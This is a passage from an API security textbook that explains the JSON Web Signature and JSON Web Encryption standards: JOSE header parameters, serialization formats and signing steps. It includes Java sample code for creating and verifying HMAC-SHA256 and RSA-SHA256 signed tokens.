sign the JSON payload should be the very first entry in the JSON array, and the rest is the certificates of intermediate CAs (certificate authority) and the root CA. The x5c is an optional parameter in the JOSE header. 4 The Internet IP Security PKI Profile of IKEv1/ISAKMP, IKEv2, and PKIX (RFC 4945) defines the delimiters for X.509 certificates under Section 6.1, https://tools.ietf.org/html/rfc4945 CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 170 • x5t: The x5t parameter in the JOSE header represents the base64url- encoded SHA-1 thumbprint of the X.509 certificate corresponding to the key used to sign the JSON payload. This is similar to the kid parameter we discussed before. Both these parameters are used to locate the key. If the token issuer uses the x5t parameter in the JOSE header to let the recipient know about the signing key, then the corresponding key should be exchanged “somehow” between the token issuer and the recipient beforehand. How this key exchange happens is out of the scope of the JWS specification. The x5t is an optional parameter in the JOSE header. • x5t#s256: The x5t#s256 parameter in the JOSE header represents the base64url-encoded SHA256 thumbprint of the X.509 certificate corresponding to the key used to sign the JSON payload. The only difference between x5t#s256 and the x5t is the hashing algorithm. The x5t#s256 is an optional parameter in the JOSE header. • typ: The typ parameter in the JOSE header is used to define the media type of the complete JWS. There are two types of components that process a JWS: JWS implementations and JWS applications. Nimbus5 is a JWS implementation in Java. The Nimbus library knows how to build and parse a JWS. A JWS application can be anything, which uses JWS internally. A JWS application uses a JWS implementation to build or parse a JWS. In this case, the typ parameter is just another parameter for the JWS implementation. It will not try to interpret the value of it, but the JWS application would. The typ parameter will help JWS applications to differentiate the content when multiple types of objects are present. For a JWS token using JWS compact serialization and for a JWE token using JWE compact serialization, the value of the typ parameter is JOSE, and for a JWS token using JWS JSON serialization and for a JWE token using JWE JSON serialization, the value is JOSE+JSON. (JWS serialization is discussed later in this chapter, and JWE serialization is discussed in Chapter 8). The typ is an optional parameter in the JOSE header. 5 Nimbus JWT Java implementation, http://connect2id.com/products/nimbus-jose-jwt CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 171 • cty: The cty parameter in the JOSE header is used to represent the media type of the secured content in the JWS. It is only recommended to use this parameter in the case of a nested JWT. The nested JWT is discussed later in Chapter 8, and the definition of the cty parameter is further explained there. The cty is an optional parameter in the JOSE header. • crit: The crit parameter in the JOSE header is used to indicate the recipient of the JWS that the presence of custom parameters, which neither defined by the JWS or JWA specifications, in the JOSE header. If these custom parameters are not understood by the recipient, then the JWS token will be treated as invalid. The value of the crit parameter is a JSON array of names, where each entry represents a custom parameter. The crit is an optional parameter in the JOSE header. Out of all the 11 parameters defined earlier, 7 talk about how to reference the public key corresponding to the key, which is used to sign the JSON payload. There are three ways of referencing a key: external reference, embedded, and key identifier. The jku and x5u parameters fall under the external reference category. Both of them reference the key through a URI. The jwk and x5c parameters fall under embedded reference category. Each one of them defines how to embed the key to the JOSE header itself. The kid, x5t, and x5t#s256 parameters fall under the key identifier reference category. All three of them define how to locate the key using an identifier. Then again all the seven parameters can further divide into two categories based on the representation of the key: JSON Web Key (JWK) and X.509. The jku, jwk, and kid fall under the JWK category, while x5u, x5c, x5t, and x5t#s256 fall under the X.509 category. In the JOSE header of a given JWS token, at a given time, we only need to have one from the preceding parameters. Note If any of the jku, jwk, kid, x5u, x5c, x5t, and x5t#s256 are present in the JOSE header, those must be integrity protected. Failure to do so will let an attacker modify the key used to sign the message and change the content of the message payload. After validating the signature of a JWS token, the recipient application must check whether the key associated with the signature is trusted. Checking whether the recipient knows the corresponding key can do the trust validation. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 172 The JWS specification does not restrict applications only to use 11 header parameters defined earlier. There are two ways to introduce new header parameters: public header names and private header names. Any header parameter that is intended to use in the public space should be introduced in a collision-resistant manner. It is recommended to register such public header parameters in the IANA JSON Web Signature and Encryption Header Parameters registry. The private header parameters are mostly used in a restricted environment, where both the token issuer and the recipients are well aware of each other. These parameters should be used with caution, because there is a chance for collision. If a given recipient accepts tokens from multiple token issuers, then the semantics of the same parameter may be different from one issuer to another, if it is a private header. In either case, whether it’s a public or a private header parameter, if it is not defined in the JWS or the JWA specification, the header name should be included in the crit header parameter, which we discussed before. JWS Payload The JWS payload is the message that needs to be signed. The message can be anything— need not be a JSON payload. If it is a JSON payload, then it could contain whitespaces and/or line breaks before or after any JSON value. The second element of the serialized JWS token carries the base64url-encoded value of the JWS payload. JWS Signature The JWS signature is the digital signature or the MAC, which is calculated over the JWS payload and the JOSE header. The third element of the serialized JWS token carries the base64url- encoded value of the JWS signature. The Process of Signing (Compact Serialization) We discussed about all the ingredients that are required to build a JWS token under compact serialization. The following discusses the steps involved in building a JWS token. There are three elements in a JWS token; the first element is produced by step 2, the second element is produced by step 4, and the third element is produced by step 7. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 173 1. Build a JSON object including all the header parameters, which express the cryptographic properties of the JWS token—this is known as the JOSE header. As discussed before in this chapter, under the section “JOSE Header,” the token issuer should advertise in the JOSE header the public key corresponding to the key used to sign the message. This can be expressed via any of these header parameters: jku, jwk, kid, x5u, x5c, x5t, and x5t#s256. 2. Compute the base64url-encoded value against the UTF-8 encoded JOSE header from step 1 to produce the first element of the JWS token. 3. Construct the payload or the content to be signed—this is known as the JWS payload. The payload is not necessarily JSON—it can be any content. 4. Compute the base64url-encoded value of the JWS payload from step 3 to produce the second element of the JWS token. 5. Build the message to compute the digital signature or the MAC. The message is constructed as ASCII(BASE64URL- ENCODE(UTF8(JOSE Header)) . BASE64URL-ENCODE(JWS Payload)). 6. Compute the signature over the message constructed in step 5, following the signature algorithm defined by the JOSE header parameter alg. The message is signed using the private key corresponding to the public key advertised in the JOSE header. 7. Compute the base64url-encoded value of the JWS signature produced in step 6, which is the third element of the serialized JWS token. 8. Now we have all the elements to build the JWS token in the following manner. The line breaks are introduced only for clarity. BASE64URL(UTF8(JWS Protected Header)). BASE64URL(JWS Payload). BASE64URL(JWS Signature) CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 174 JWS JSON Serialization In contrast to the JWS compact serialization, the JWS JSON serialization can produce multiple signatures over the same JWS payload along with different JOSE header parameters. The ultimate serialized form under JWS JSON serialization wraps the signed payload in a JSON object, with all related metadata. This JSON object includes two top-level elements, payload and signatures, and three subelements under the signatures element: protected, header, and signature. The following is an example of a JWS token, which is serialized with JWS JSON serialization. This is neither URL safe nor optimized for compactness. It carries two signatures over the same payload, and each signature and the metadata around it are stored as an element in the JSON array, under the signatures top-level element. Each signature uses a different key to sign, represented by the corresponding kid header parameter. The JSON serialization is also useful in selectively signing JOSE header parameters. In contrast, JWS compact serialization signs the complete JOSE header: { "payload":"eyJpc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzOD", "signatures":[ { "protected":"eyJhbGciOiJSUzI1NiJ9", "header":{"kid":"2014-06-29"}, "signature":"cC4hiUPoj9Eetdgtv3hF80EGrhuB" }, { "protected":"eyJhbGciOiJFUzI1NiJ9", "header":{"kid":"e909097a-ce81-4036-9562-d21d2992db0d"}, "signature":"DtEhU3ljbEg8L38VWAfUAqOyKAM" } ] } JWS Payload The payload top-level element of the JSON object includes the base64url-encoded value of the complete JWS payload. The JWS payload necessarily need not be a JSON payload, it can be of any content type. The payload is a required element in the serialized JWS token. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 175 JWS Protected Header The JWS Protected Header is a JSON object that includes the header parameters that have to be integrity protected by the signing or MAC algorithm. The protected parameter in the serialized JSON form represents the base64url-encoded value of the JWS Protected Header. The protected is not a top-level element of the serialized JWS token. It is used to define elements in the signatures JSON array and includes the base64url-encoded header elements, which should be signed. If you base64url-decode the value of the first protected element in the preceding code snippet, you will see {"alg":"RS256"}. The protected parameter must be present, if there are any protected header parameters. There is one protected element for each entry of the signatures JSON array. JWS Unprotected Header The JWS Unprotected Header is a JSON object that includes the header parameters that are not integrity protected by the signing or MAC algorithm. The header parameter in the serialized JSON form represents the base64url-encoded value of the JWS Unprotected Header. The header is not a top-level parameter of the JSON object. It is used to define elements in the signatures JSON array. The header parameter includes unprotected header elements related to the corresponding signature, and these elements are not signed. Combining both the protected headers and unprotected headers ultimately derives the JOSE header corresponding to the signature. In the preceding code snippet, the complete JOSE header corresponding to the first entry in the signatures JSON array would be {"alg":"RS256", "kid":"2010-12-29"}. The header element is represented as a JSON object and must be present if there are any unprotected header parameters. There is one header element for each entry of the signatures JSON array. JWS Signature The signatures parameter of the JSON object includes an array of JSON objects, where each element includes a signature or MAC (over the JWS payload and JWS protected header) and the associated metadata. This is a required parameter. The signature subelement, which is inside each entry of the signatures array, carries the base64url-encoded value of the signature computed over the protected header elements (represented by the protected parameter) and the JWS payload. Both the signatures and signature are required parameters. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 176 Note Even though JSON serialization provides a way to selectively sign JOSE header parameters, it does not provide a direct way to selectively sign the parameters in the JWS payload. Both forms of serialization mentioned in the JWS specification sign the complete JWS payload. There is a workaround for this using JSON serialization. you can replicate the payload parameters that need to be signed selectively in the JOSE header. Then with JSON serialization, header parameters can be selectively signed. The Process of Signing (JSON Serialization) We discussed about all the ingredients that are required to build a JWS token under JSON serialization. The following discusses the steps involved in building the JWS token. 1. Construct the payload or the content to be signed—this is known as the JWS payload. The payload is not necessarily JSON—it can be any content. The payload element in the serialized JWS token carries the base64url-encoded value of the content. 2. Decide how many signatures you would need against the payload and for each case which header parameters must be signed and which are not. 3. Build a JSON object including all the header parameters that are to be integrity protected or to be signed. In other words, construct the JWS Protected Header for each signature. The base64url- encoded value of the UTF-8 encoded JWS Protected Header will produce the value of the protected subelement inside the signatures top-level element of the serialized JWS token. 4. Build a JSON object including all the header parameters that need not be integrity protected or not be signed. In other words, construct the JWS Unprotected Header for each signature. This will produce the header subelement inside the signatures top-level element of the serialized JWS token. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 177 5. Both the JWS Protected Header and the JWS Unprotected Header express the cryptographic properties of the corresponding signature (there can be more than one signature element)— this is known as the JOSE header. As discussed before in this chapter, under the section “JOSE Header,” the token issuer should advertise in the JOSE header the public key corresponding to the key used to sign the message. This can be expressed via any of these header parameters: jku, jwk, kid, x5u, x5c, x5t, and x5t#s256. 6. Build the message to compute the digital signature or the MAC against each entry in the signatures JSON array of the serialized JWS token. The message is constructed as ASCII(BASE64URL- ENCODE(UTF8(JWS Protected Header)). BASE64URL- ENCODE(JWS Payload)). 7. Compute the signature over the message constructed in step 6, following the signature algorithm defined by the header parameter alg. This parameter can be either inside the JWS Protected Header or the JWS Unprotected Header. The message is signed using the private key corresponding to the public key advertised in the header. 8. Compute the base64url-encoded value of the JWS signature produced in step 7, which will produce the value of the signature subelement inside the signatures top-level element of the serialized JWS token. 9. Once all the signatures are computed, the signatures top-level element can be constructed and will complete the JWS JSON serialization. SIGNATURE TYPES The XML Signature specification, which was developed under W3C, proposes three types of signatures: enveloping, enveloped, and detached. These three kinds of signatures are only discussed under the context of XML. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 178 With the enveloping signature, the XML content to be signed is inside the signature itself. That is, inside the <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> element. With the enveloped signature, the signature is inside the XML content to be signed. In other words, the <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> element is inside the parent element of the XML payload to be signed. With the detached signature, there is no parent-child relationship between the XML content to be signed and the corresponding signature. They are detached from each other. For anyone who is familiar with XML Signature, all the signatures defined in the JWS specification can be treated as detached signatures. Note The XML Signature specification by W3C only talks about signing an XML payload. If you have to sign any content, then first you need to embed that within an XML payload and then sign. In contrast, the JWS specification is not just limited to JSON. you can sign any content with JWS without wrapping it inside a JSON payload. GENERATING A JWS TOKEN WITH HMAC-SHA256 WITH A JSON PAYLOAD The following Java code generates a JWS token with HMAC-SHA256. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/ samples/tree/master/ch07/sample02. The method buildHmacSha256SignedJWT() in the code should be invoked by passing a secret value that is used as the shared key to sign. The length of the secret value must be at least 256 bits: public static String buildHmacSha256SignedJSON(String sharedSecretString) throws JOSEException { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 179 Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to // this subject. subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 * 60 * 10)). // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT // identifier. jwtID(UUID.randomUUID().toString()). build(); // create JWS header with HMAC-SHA256 algorithm. JWSHeader jswHeader = new JWSHeader(JWSAlgorithm.HS256); // create signer with the provider shared secret. JWSSigner signer = new MACSigner(sharedSecretString); // create the signed JWT with the JWS header and the JWT body. SignedJWT signedJWT = new SignedJWT(jswHeader, jwtClaims); // sign the JWT with HMAC-SHA256. signedJWT.sign(signer); // serialize into base64url-encoded text. String jwtInText = signedJWT.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 180 To build and run the program, execute the following Maven command from the ch07/ sample02 directory. \> mvn test -Psample02 The preceding code produces the following output, which is a signed JSON payload (a JWS). If you run the code again and again, you may not get the same output as the value of the currentTime variable changes every time you run the program: eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0MDIwMzkyOTIsInN1YiI6ImpvaG4iLCJuYm YiOjE0MDIwMzg2OTIsImF1ZCI6WyJodHRwczpcL1wvYXBwMS5mb28uY29tIiw iaHR0cHM6XC9cL2FwcDIuZm9vLmNvbSJdLCJpc3MiOiJodHRwczpcL1wvYXBy ZXNzLmNvbSIsImp0aSI6ImVkNjkwN2YwLWRlOGEtNDMyNi1hZDU2LWE5ZmE 5NjA2YTVhOCIsImlhdCI6MTQwMjAzODY5Mn0.3v_pa-QFCRwoKU0RaP7pLOox T57okVuZMe_A0UcqQ8 The following Java code shows how to validate the signature of a signed JSON message with HMAC-SHA256. To do that, you need to know the shared secret used to sign the JSON payload: public static boolean isValidHmacSha256Signature() throws JOSEException, ParseException { String sharedSecretString = "ea9566bd-590d-4fe2-a441-d5f240050dbc"; // get signed JWT in base64url-encoded text. String jwtInText = buildHmacSha256SignedJWT(sharedSecretString); // create verifier with the provider shared secret. JWSVerifier verifier = new MACVerifier(sharedSecretString); // create the signed JWS token with the base64url-encoded text. SignedJWT signedJWT = SignedJWT.parse(jwtInText); // verify the signature of the JWS token. boolean isValid = signedJWT.verify(verifier); if (isValid) { System.out.println("valid JWT signature"); } else { System.out.println("invalid JWT signature"); } return isValid; } CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 181 GENERATING A JWS TOKEN WITH RSA-SHA256 WITH A JSON PAYLOAD The following Java code generates a JWS token with RSA-SHA256. you can download the complete Java sample as a Maven project from https://github.com/ apisecurity/samples/tree/master/ch07/sample03. First you need to invoke the method generateKeyPair() and pass the PrivateKey(generateKeyPair(). getPrivateKey()) into the method buildRsaSha256SignedJSON(): public static KeyPair generateKeyPair() throws NoSuchAlgorithmException { // instantiate KeyPairGenerate with RSA algorithm. KeyPairGenerator keyGenerator = KeyPairGenerator.getInstance("RSA"); // set the key size to 1024 bits. keyGenerator.initialize(1024); // generate and return private/public key pair. return keyGenerator.genKeyPair(); } public static String buildRsaSha256SignedJSON(PrivateKey privateKey) throws JOSEException { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to // this subject. subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 * 60 * 10)). CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 182 // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT identifier. jwtID(UUID.randomUUID().toString()). build(); // create JWS header with RSA-SHA256 algorithm. JWSHeader jswHeader = new JWSHeader(JWSAlgorithm.RS256); // create signer with the RSA private key.. JWSSigner signer = new RSASSASigner((RSAPrivateKey)privateKey); // create the signed JWT with the JWS header and the JWT body. SignedJWT signedJWT = new SignedJWT(jswHeader, jwtClaims); // sign the JWT with HMAC-SHA256. signedJWT.sign(signer); // serialize into base64-encoded text. String jwtInText = signedJWT.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } The following Java code shows how to invoke the previous two methods: KeyPair keyPair = generateKeyPair(); buildRsaSha256SignedJSON(keyPair.getPrivate()); To build and run the program, execute the following Maven command from the ch07/ sample03 directory. \> mvn test -Psample03 Let’s examine how to validate a JWS token signed by RSA-SHA256. you need to know the PublicKey corresponding to the PrivateKey used to sign the message: public static boolean isValidRsaSha256Signature() throws NoSuchAlgorithmException, JOSEException, ParseException { // generate private/public key pair. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 183 KeyPair keyPair = generateKeyPair(); // get the private key - used to sign the message. PrivateKey privateKey = keyPair.getPrivate(); // get public key - used to verify the message signature. PublicKey publicKey = keyPair.getPublic(); // get signed JWT in base64url-encoded text. String jwtInText = buildRsaSha256SignedJWT(privateKey); // create verifier with the provider shared secret. JWSVerifier verifier = new RSASSAVerifier((RSAPublicKey) publicKey); // create the signed JWT with the base64url-encoded text. SignedJWT signedJWT = SignedJWT.parse(jwtInText); // verify the signature of the JWT. boolean isValid = signedJWT.verify(verifier); if (isValid) { System.out.println("valid JWT signature"); } else { System.out.println("invalid JWT signature"); } return isValid; } GENERATING A JWS TOKEN WITH HMAC-SHA256 WITH A NON-JSON PAYLOAD The following Java code generates a JWS token with HMAC-SHA256. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/ samples/tree/master/ch07/sample04. The method buildHmacSha256Signed NonJSON() in the code should be invoked by passing a secret value that is used as the shared key to sign. The length of the secret value must be at least 256 bits: public static String buildHmacSha256SignedJWT(String sharedSecretString) throws JOSEException { // create an HMAC-protected JWS object with a non-JSON payload JWSObject jwsObject = new JWSObject(new JWSHeader(JWSAlgorithm.HS256), new Payload("Hello world!")); CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 184 // create JWS header with HMAC-SHA256 algorithm. jwsObject.sign(new MACSigner(sharedSecretString)); // serialize into base64-encoded text. String jwtInText = jwsObject.serialize(); // print the value of the serialzied JWS token. System.out.println(jwtInText); return jwtInText; } To build and run the program, execute the following Maven command from the ch07/ sample04 directory. \> mvn test -Psample04 The preceding code uses the JWS compact serialization and will produce the following output: eyJhbGciOiJIUzI1NiJ9.SGVsbG8gd29ybGQh.zub7JG0FOh7EIKAgWMzx95w-nFpJdRMvUh_ pMwd6wnA Summary • JSON has already become the de facto message exchange format for APIs. • Understanding JSON security plays a key role in securing APIs. • JSON Web Token (JWT) defines a container to transport data between interested parties in a cryptographically safe manner. It became an IETF standard in May 2015 with the RFC 7519. • Both JWS (JSON Web Signature) and JWE (JSON Web Encryption) standards are built on top of JWT. • There are two types of serialization techniques defined by the JWS specification: compact serialization and JSON serialization. • The JWS specification is not just limited to JSON. You can sign any content with JWS without wrapping it inside a JSON payload. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 185 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_8 CHAPTER 8 Message-Level Security with JSON Web Encryption In Chapter 7, we discussed in detail the JWT (JSON Web Token) and JWS (JSON Web Signature) specifications. Both of these specifications are developed under the IETF JOSE working group. This chapter focuses on another prominent standard developed by the same IETF working group for encrypting messages (not necessarily JSON payloads): JSON Web Encryption (JWE). Like in JWS, JWT is the foundation for JWE. The JWE specification standardizes the way to represent an encrypted content in a JSON-based data structure. The JWE1 specification defines two serialized forms to represent the encrypted payload: the JWE compact serialization and JWE JSON serialization. Both of these two serialization techniques are discussed in detail in the sections to follow. Like in JWS, the message to be encrypted using JWE standard need not be a JSON payload, it can be any content. The term JWE token is used to refer to the serialized form of an encrypted message (any message, not just JSON), following any of the serialization techniques defined in the JWE specification. JWE Compact Serialization With the JWE compact serialization, a JWE token is built with five key components, each separated by periods (.): JOSE header, JWE Encrypted Key, JWE Initialization Vector, JWE Ciphertext, and JWE Authentication Tag. Figure 8-1 shows the structure of a JWE token formed by JWE compact serialization. 1 The JSON Web Encryption specification, https://tools.ietf.org/html/rfc7516 186 JOSE Header The JOSE header is the very first element of the JWE token produced under compact serialization. The structure of the JOSE header is the same, as we discussed in Chapter 7, other than few exceptions. The JWE specification introduces two new parameters (enc and zip), which are included in the JOSE header of a JWE token, in addition to those introduced by the JSON Web Signature (JWS) specification. The following lists out all the JOSE header parameters, which are defined by the JWE specification: • alg (algorithm): The name of the algorithm, which is used to encrypt the Content Encryption Key (CEK). The CEK is a symmetric key, which encrypts the plaintext JSON payload. Once the plaintext is encrypted with the CEK, the CEK itself will be encrypted with another key following the algorithm identified by the value of the alg parameter. The encrypted CEK will then be included in the JWE Encrypted Key section of the JWE token. This is a required attribute in the JOSE header. Failure to include this in the header will result in a token parsing error. The value of the alg parameter is a string, which is picked from the JSON Web Signature and Encryption Algorithms registry defined by the JSON Web Algorithms2 (JWA) specification. If the value of the alg parameter is not picked from the preceding registry, then it should be defined in a collision-resistant manner, but that won’t give any guarantee that the particular algorithm is identified by all JWE implementations. It’s always better to stick to the algorithms defined in the JWA specification. • enc: The enc parameter in the JOSE header represents the name of the algorithm, which is used for content encryption. This algorithm should be a symmetric Authenticated Encryption with Associated 2 JWS algorithms are defined and explained in the JSON Web Algorithms (JWA) specification, https://tools.ietf.org/html/rfc7518. Figure 8-1. A JWE token with compact serialization Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 187 Data (AEAD) algorithm. This is a required attribute in the JOSE header. Failure to include this in the header will result in a token parsing error. The value of the enc parameter is a string, which is picked from the JSON Web Signature and Encryption Algorithms registry defined by the JSON Web Algorithms (JWA) specification. If the value of the enc parameter is not picked from the preceding registry, then it should be defined in a collision-resistant manner, but that won’t give any guarantee that the particular algorithm is identified by all JWE implementations. It’s always better to stick to the algorithms defined in the JWA specification. • zip: The zip parameter in the JOSE header defines the name of the compression algorithm. The plaintext JSON payload gets compressed before the encryption, if the token issuer decides to use compression. The compression is not a must. The JWE specification defines DEF as the compression algorithm, but it’s not a must to use it. The token issuers can define their own compression algorithms. The default value of the compression algorithm is defined in the JSON Web Encryption Compression Algorithms registry under the JSON Web Algorithms (JWA) specification. This is an optional parameter. • jku: The jku parameter in the JOSE header carries a URL, which points to a JSON Web Key (JWK)3 set. This JWK set represents a collection of JSON-encoded public keys, where one of the keys is used to encrypt the Content Encryption Key (CEK). Whatever the protocol used to retrieve the key set should provide the integrity protection. If keys are retrieved over HTTP, then instead of plain HTTP, HTTPS (or HTTP over TLS) should be used. We discuss Transport Layer Security (TLS) in detail in Appendix C. The jku is an optional parameter. • jwk: The jwk parameter in JOSE header represents the public key corresponding to the key that is used to encrypt the Content Encryption Key (CEK). The key is encoded as per the JSON Web Key (JWK) specification.3 The jku parameter, which we discussed before, 3 A JSON Web Key (JWK) is a JSON data structure that represents a cryptographic key, https://tools.ietf.org/html/rfc7517 Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 188 points to a link that holds a set of JWKs, while the jwk parameter embeds the key into the JOSE header itself. The jwk is an optional parameter. • kid: The kid parameter of the JOSE header represents an identifier for the key that is used to encrypt the Content Encryption Key (CEK). Using this identifier, the recipient of the JWE should be able to locate the key. If the token issuer uses the kid parameter in the JOSE header to let the recipient know about the signing key, then the corresponding key should be exchanged “somehow” between the token issuer and the recipient beforehand. How this key exchange happens is out of the scope of the JWE specification. If the value of the kid parameter refers to a JWK, then the value of this parameter should match the value of the kid parameter in the JWK. The kid is an optional parameter in the JOSE header. • x5u: The x5u parameter in the JOSE header is very much similar to the jku parameter, which we discussed before. Instead of pointing to a JWK set, the URL here points to an X.509 certificate or a chain of X.509 certificates. The resource pointed by the URL must hold the certificate or the chain of certificates in the PEM-encoded form. Each certificate in the chain must appear between the delimiters4: -----BEGIN CERTIFICATE----- and -----END CERTIFICATE-----. The public key corresponding to the key used to encrypt the Content Encryption Key (CEK) should be the very first entry in the certificate chain, and the rest is the certificates of intermediate CAs (certificate authority) and the root CA. The x5u is an optional parameter in the JOSE header. • x5c: The x5c parameter in the JOSE header represents the X.509 certificate (or the certificate chain), which corresponds to the public key, which is used to encrypt the Content Encryption Key (CEK). This is similar to the jwk parameter we discussed before, but in this case instead of a JWK, it’s an X.509 certificate (or a chain of certificates). The certificate or the certificate chain is represented in a JSON 4 The Internet IP Security PKI Profile of IKEv1/ISAKMP, IKEv2, and PKIX (RFC 4945) defines the delimiters for X.509 certificates under Section 6.1, https://tools.ietf.org/html/rfc4945 Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 189 array of certificate value strings. Each element in the array should be a base64-encoded DER PKIX certificate value. The public key corresponding to the key used to encrypt the Content Encryption Key (CEK) should be the very first entry in the JSON array, and the rest is the certificates of intermediate CAs (certificate authority) and the root CA. The x5c is an optional parameter in the JOSE header. • x5t: The x5t parameter in the JOSE header represents the base64url- encoded SHA-1 thumbprint of the X.509 certificate corresponding to the key used to encrypt the Content Encryption Key (CEK). This is similar to the kid parameter we discussed before. Both these parameters are used to locate the key. If the token issuer uses the x5t parameter in the JOSE header to let the recipient know about the signing key, then the corresponding key should be exchanged “somehow” between the token issuer and the recipient beforehand. How this key exchange happens is out of the scope of the JWE specification. The x5t is an optional parameter in the JOSE header. • x5t#s256: The x5t#s256 parameter in the JOSE header represents the base64url-encoded SHA256 thumbprint of the X.509 certificate corresponding to the key used to encrypt the Content Encryption Key (CEK). The only difference between x5t#s256 and the x5t is the hashing algorithm. The x5t#s256 is an optional parameter in the JOSE header. • typ: The typ parameter in the JOSE header is used to define the media type of the complete JWE. There are two types of components that process a JWE: JWE implementations and JWE applications. Nimbus5 is a JWE implementation in Java. The Nimbus library knows how to build and parse a JWE. A JWE application can be anything, which uses JWE internally. A JWE application uses a JWE implementation to build or parse a JWE. In this case, the typ parameter is just another parameter for the JWE implementation. It will not try to interpret the value of it, but the JWE application would. The typ parameter will help JWE applications to differentiate the 5 Nimbus JWT Java implementation, http://connect2id.com/products/nimbus-jose-jwt Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 190 content when multiple types of objects are present. For a JWS token using JWS compact serialization and for a JWE token using JWE compact serialization, the value of the typ parameter is JOSE, and for a JWS token using JWS JSON serialization and for a JWE token using JWE JSON serialization, the value is JOSE+JSON. (JWS serialization was discussed in Chapter 7 and JWE serialization is discussed later in this chapter). The typ is an optional parameter in the JOSE header. • cty: The cty parameter in the JOSE header is used to represent the media type of the secured content in the JWE. It is only recommended to use this parameter in the case of a nested JWT. The nested JWT is discussed later in this chapter, and the definition of the cty parameter is further explained there. The cty is an optional parameter in the JOSE header. • crit: The crit parameter in the JOSE header is used to indicate to the recipient of the JWE that the presence of custom parameters, which neither defined by the JWE or JWA specifications, in the JOSE header. If these custom parameters are not understood by the recipient, then the JWE token will be treated as invalid. The value of the crit parameter is a JSON array of names, where each entry represents a custom parameter. The crit is an optional parameter in the JOSE header. Out of all the 13 parameters defined earlier, 7 talk about how to reference the public key, which is used to encrypt the Content Encryption Key (CEK). There are three ways of referencing a key: external reference, embedded, and key identifier. The jku and x5u parameters fall under the external reference category. Both of them reference the key through a URI. The jwk and x5c parameters fall under embedded reference category. Each one of them defines how to embed the key to the JOSE header itself. The kid, x5t, and x5t#s256 parameters fall under the key identifier reference category. All three of them define how to locate the key using an identifier. Then again all the seven parameters can further divide into two categories based on the representation of the key: JSON Web Key (JWK) and X.509. The jku, jwk, and kid fall under the JWK category, while x5u, x5c, x5t, and x5t#s256 fall under the X.509 category. In the JOSE header of a given JWE token, at a given time, we only need to have one from the preceding parameters. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 191 Note the JsON payload, which is subject to encryption, could contain whitespaces and/or line breaks before or after any JsON value. The JWE specification does not restrict applications only to use 13 header parameters defined earlier. There are two ways to introduce new header parameters: public header names and private header names. Any header parameter that is intended to use in the public space should be introduced in a collision-resistant manner. It is recommended to register such public header parameters in the IANA JSON Web Signature and Encryption Header Parameters registry. The private header parameters are mostly used in a restricted environment, where both the token issuer and the recipients are well aware of each other. These parameters should be used with caution, because there is a chance for collision. If a given recipient accepts tokens from multiple token issuers, then the semantics of the same parameter may be different from one issuer to another, if it is a private header. In either case, whether it’s a public or a private header parameter, if it is not defined in the JWE or the JWA specification, the header name should be included in the crit header parameter, which we discussed before. JWE Encrypted Key To understand JWE Encrypted Key section of the JWE, we first need to understand how a JSON payload gets encrypted. The enc parameter of the JOSE header defines the content encryption algorithm, and it should be a symmetric Authenticated Encryption with Associated Data (AEAD) algorithm. The alg parameter of the JOSE header defines the encryption algorithm to encrypt the Content Encryption Key (CEK). We can also call this algorithm a key wrapping algorithm, as it wraps the CEK. AUTHENTICATED ENCRYPTION encryption alone only provides the data confidentiality. Only the intended recipient can decrypt and view the encrypted data. even though data is not visible to everyone, anyone having access to the encrypted data can change the bit stream of it to reflect a different message. For example, if alice transfers us $100 from her bank account to bob’s account and if that message is encrypted, then 